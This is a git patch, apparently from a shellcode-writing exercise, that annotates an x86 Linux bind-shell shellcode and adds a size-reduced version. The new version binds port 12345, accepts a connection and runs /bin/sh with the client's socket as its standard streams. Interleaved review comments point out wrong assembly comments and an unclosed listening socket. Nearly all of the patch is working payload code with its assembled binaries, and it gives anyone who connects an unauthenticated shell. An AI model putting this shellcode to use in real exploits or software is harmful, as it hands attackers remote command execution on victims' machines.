From 992e145a0e3cc2f8a13589fff6c1367092147cfb Mon Sep 17 00:00:00 2001
From: arno01
Date: Fri, 8 Mar 2013 16:06:25 +0100
Subject: [PATCH] Creating a smaller version of shell_bind_tcp -> shell_bind_tcp_smaller.nasm
---
 exam1/shell_bind_tcp | Bin 628 -> 628 bytes
 exam1/shell_bind_tcp.nasm | 24 +++++----
 exam1/shell_bind_tcp.o | Bin 560 -> 560 bytes
 exam1/shell_bind_tcp_smaller | Bin 0 -> 626 bytes
 exam1/shell_bind_tcp_smaller.nasm | 87 ++++++++++++++++++++++++++++++
 exam1/shell_bind_tcp_smaller.o | Bin 0 -> 560 bytes
 6 files changed, 100 insertions(+), 11 deletions(-)
 create mode 100755 exam1/shell_bind_tcp_smaller
 create mode 100644 exam1/shell_bind_tcp_smaller.nasm
 create mode 100644 exam1/shell_bind_tcp_smaller.o
diff --git a/exam1/shell_bind_tcp b/exam1/shell_bind_tcp
index 61f977ee81788e4d2b4351c475c98faf852c86da..da129204fc5031e6362e8320fe2f150b3b3190b8 100755
GIT binary patch delta 74 zcmeyu@`YuB3+odG28JgSJ?$8SCw48Htj8$E*fQCbQJL|{4E@ESqe=D8kq_*_Bb5@!8}|#?^|?Ca`b-l`se} UeEhEgQj5gb2l8J`Hf6F00GU@7F#rGn
diff --git a/exam1/shell_bind_tcp.nasm b/exam1/shell_bind_tcp.nasm
index 60ad88f..f16d7c9 100644
--- a/exam1/shell_bind_tcp.nasm
+++ b/exam1/shell_bind_tcp.nasm
@@ -105,7 +105,7 @@ _start:
 push BYTE 6 ; IPPROTO_TCP || int protocol);
 push BYTE 1 ; SOCK_STREAM || int type,
 push BYTE 2 ; AF_INET || socket(int domain,
- mov ecx, esp
+ mov ecx, esp ; ECX - PTR to arguments for socket()
 int 0x80 ; EAX return
@@ -134,10 +134,10 @@ _start:
 ; ECX
 xor edx, edx
- push edx ; ANY HOST (0.0.0.0)} || struct in_addr sin_addr (unsigned long s_addr) };
- ;; push DWORD 0x0100007f ; For 127.0.0.1 HOST ||
- push WORD 0x3930 ; PORT 12345 (reverse), || unsigned short sin_port,
- push WORD 2 ; AF_INET || struct sockaddr { short sin_family,
+ push edx ; ANY HOST (0.0.0.0)} || struct in_addr sin_addr (unsigned long s_addr) };
+ ;; push DWORD 0x0100007f ; For 127.0.0.1 HOST
+ push WORD 0x3930 ; PORT 12345 (reverse), || unsigned short sin_port,
+ push WORD bx ; 2 - AF_INET || struct sockaddr { short sin_family,
 mov ecx, esp ; Save PTR to sockaddr struct in ECX
 push BYTE 16 ; socklen_t addrlen);
@@ -188,7 +188,7 @@ _start:
 ; EAX
 xor eax, eax
- mov al, 102
+ mov al, 102 ; socketcall
 ; EBX
 xor ebx, ebx
@@ -217,19 +217,21 @@ _start:
 ; 63 sockfd 2 ;
- mov ebx, eax ; move current fd (socket) to EBX
+ ; move our sockfd to EBX
+ mov ebx, eax
+ xor eax, eax
 mov al, 63 ; dup2 syscall
 xor ecx, ecx ; 0 - stdin
- int 0x80
+ int 0x80 ; call dup2(sockfd, 0)
 mov al, 63 ; dup2 syscall
 mov cl, 1 ; 1 - stdout
- int 0x80
+ int 0x80 ; call dup2(sockfd, 1)
 mov al, 63 ; dup2 syscall
 mov cl, 2 ; 2 - stderr
- int 0x80
+ int 0x80 ; call dup2(sockfd, 2)
@@ -266,7 +266,7 @@ _start:
 ; EDX
 push edx ; NULL terminator
 mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
- int 0x80
+ int 0x80 ; call execve(EBX, ECX, EDX)
diff --git a/exam1/shell_bind_tcp.o b/exam1/shell_bind_tcp.o
index ff6b7e6bb2a3039fdc8a7a7c63f980bb7c008a46..90c691cdd40a6fdcc8739972d1d61daf10d0197d 100644
GIT binary patch delta 21 dcmdnMvVmnn4P(p1+FgvnldTxjC(mb`2mo2*2oC@N delta 23 fcmdnMvVmnn4P)EH+Fi^UObnAP7}F;&Wb6k3WjF{Z
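Review bot: The new `push WORD bx` makes the sin_family field depend on EBX holding exactly 2 at this point, which is only true because the SYS_BIND socketcall number loaded earlier (outside this hunk) happens to equal AF_INET; anyone who later reorders the `inc ebx` sequence will silently bind with a wrong address family and the comment `; 2 - AF_INET` does not warn them. Make the coupling explicit: `push WORD bx ; AF_INET == 2: reuses EBX, which must still hold SYS_BIND (2) here`. Note also that only 8 bytes of sockaddr_in are pushed (`push edx`, two `push WORD`) while `push BYTE 16` passes addrlen 16, so the kernel reads the sin_zero padding from whatever sits above on the stack; to my knowledge Linux ignores sin_zero for AF_INET so this is harmless, but it deserves a one-line comment rather than the `||` struct annotation alone. The enclosing `_start` routine begins and ends outside this hunk.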
diff --git a/exam1/shell_bind_tcp_smaller b/exam1/shell_bind_tcp_smaller
new file mode 100755
index 0000000000000000000000000000000000000000..c02515d22f5150240a7dde486276cb5ec4c0e467
GIT binary patch literal 626 zcmah`KTE?v6n{zopt!_Y1f6t{)<_p!M1lpup;i!`u1S-S9%)*7C)lZ3vk86#SBHFr zLdC6%t5el4;OM09r9B#4eDLn~=e>K}<3^|FbxqSig$@NE)ryNNHN?+Fp$1#%??MUm zte)A}1DF#OlqE6^I+kIMQ{Q~Ec$sTlPiE6NdEx%GWxh83VE@p+OlI7;xS~SpTNc+8 zZ8kIZ!1bH-cp9G#zs+$Yh^it8s#T|xd^D1GyqvC0W2lH>SK1Du9LzCLOnP^6`Ivv$ z2G(i!GA8ZcLTqEIP^+z@QBWo#?Y^DUG=qXr&)EEULL)|6%q7iS#mvv!!%KDaRH%7M z=aJq?ntm nbnP(o29?MbU2t#v2Q2LM`oM&=2ND=_gizdbZD|AZA{TxEjL~hD literal 0 HcmV?d00001
diff --git a/exam1/shell_bind_tcp_smaller.nasm b/exam1/shell_bind_tcp_smaller.nasm
new file mode 100644
index 0000000..14b28a1
--- /dev/null
+++ b/exam1/shell_bind_tcp_smaller.nasm
@@ -0,0 +1,87 @@
+; Filename: shell_bind_tcp_smaller.nasm
+; Author: Andrey Arapov
+; 2013 March
+;
+; DESC:
+; Binds to a port 12345
+; Execs Shell on incoming connection
+;
+; TODO:
+; 1. Port number should be easily configurable;
+;
+;
+
+global _start
+
+section .text
+
+_start:
+ xor eax, eax
+ mov al, 102 ; socketcall
+ xor ebx, ebx
+ inc ebx ; 1 = SYS_SOCKET socket()
+ push BYTE 6 ; IPPROTO_TCP || int protocol);
+ push BYTE 1 ; SOCK_STREAM || int type,
+ push BYTE 2 ; AF_INET || socket(int domain,
+ mov ecx, esp ; ECX - PTR to arguments for socket()
+ int 0x80
+ mov esi, eax ; save socket fd in ESI for later
+
+ push BYTE 102
+ pop eax ; socketcall
+ inc ebx ; 2 = SYS_BIND bind()
+ xor edx, edx
+ push edx ; 0 = ANY HOST (0.0.0.0)} || struct in_addr sin_addr (unsigned long s_addr) };
+ push WORD 0x3930 ; PORT 12345 (reverse), || unsigned short sin_port,
+ push WORD bx ; 2 = AF_INET || struct sockaddr { short sin_family,
+ mov ecx, esp ; Save PTR to sockaddr struct in ECX
+ push BYTE 16 ; socklen_t addrlen);
+ push ecx ; const struct sockaddr *addr,
+ push esi ; bind(int sockfd,
+ mov ecx, esp ; ECX = PTR to arguments for bind()
+ int 0x80
+
+
+ mov BYTE al, 102 ; socketcall
+ inc ebx
+ inc ebx ; 4 = SYS_LISTEN listen()
+ push BYTE 1 ; int backlog);
+ push esi ; listen(int sockfd,
+ mov ecx, esp ; ECX = PTR to arguments for listen()
+ int 0x80
+
+
+ mov BYTE al, 102 ; socketcall
+ inc ebx ; 5 = SYS_ACCEPT = accept()
+ push edx ; socklen_t *addrlen = 0);
+ push edx ; struct sockaddr *addr = NULL,
+ push esi ; listen(int sockfd,
+ mov ecx, esp ; ECX = PTR to arguments for accept()
+ int 0x80
+
+
+ ; dup2 to duplicate sockfd, that will attach the client to a shell
+ ; that we'll spawn below in execve syscall
+ xchg eax, ebx ; after EBX = sockfd, EAX = 5
+ push BYTE 2
+ pop ecx
+dup2_loop:
+ mov BYTE al, 63
+ int 0x80
+ dec ecx
+ jns dup2_loop
+
+
+ ; spawning as shell
+ xor eax, eax
+ push eax
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp
+ push eax
+ mov edx, esp ; ESP is now pointing to EDX
+ push ebx
+ mov ecx, esp
+ mov al, 11 ; execve
+ int 0x80
+
diff --git a/exam1/shell_bind_tcp_smaller.o b/exam1/shell_bind_tcp_smaller.o
new file mode 100644
index 0000000000000000000000000000000000000000..d781a95b3b7e4aa57f45f81cd663b3081ad4b495
GIT binary patch literal 560 zcmb<-^>JflWMqH=Mh0dE1doBi0V-hvrZpH?8JJ*7Nuoh!f-oCYmjIBHjAViUl+6yL znUTaBfa(;H_#iVtKoE$LU9tfv5daipLBb$2C4m^(Jdh?mpco9m%!Ba_4{S&?yzQLD zmc^LG)cNpiL+7!qveNO8`7MevlwB_pdc`7au!qM2K%!O zo|Qih4+Lc7=@(~Y=<6qCc0La1d<4|If%|L&%qj@2SCU#$!k|~2QCw0~l9&W!Rpvry z2p?571`pZ&EDRt2BP#&KqzX{L87|1kAPZ+RFbIHRq&OorCnr8BGcP5+B)K5II5#mT fC$&f~FR?h6A-=dIv8aS0rL@2(J|{oF0H_xLE`d
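Review bot: The comment on `push esi` in the accept block reads `listen(int sockfd,`, copied from the listen block above it; it should read `push esi ; accept(int sockfd,` so the three-argument layout (sockfd, addr = NULL, addrlen = NULL) is recognisably accept()'s. The comment `mov edx, esp ; ESP is now pointing to EDX` is inverted: EDX now points at the NULL just pushed, which execve receives as the empty envp, e.g. `mov edx, esp ; EDX -> NULL (envp = {NULL})`. Likewise `xchg eax, ebx ; after EBX = sockfd, EAX = 5` places the client fd returned by accept() into EBX, not the listening socket kept in ESI, and that listening fd is never closed, so it is presumably inherited by the spawned shell; the comment should say "client fd" and the header should mention the inherited listener. As in the original, no syscall return is checked, so a failed bind() (e.g. port 12345 already in use) leaves -errno in EAX and the following `mov BYTE al, 102` turns it into a bogus syscall number; acceptable for shellcode, but worth one line in the DESC header so nobody mistakes the silent exit for a hang.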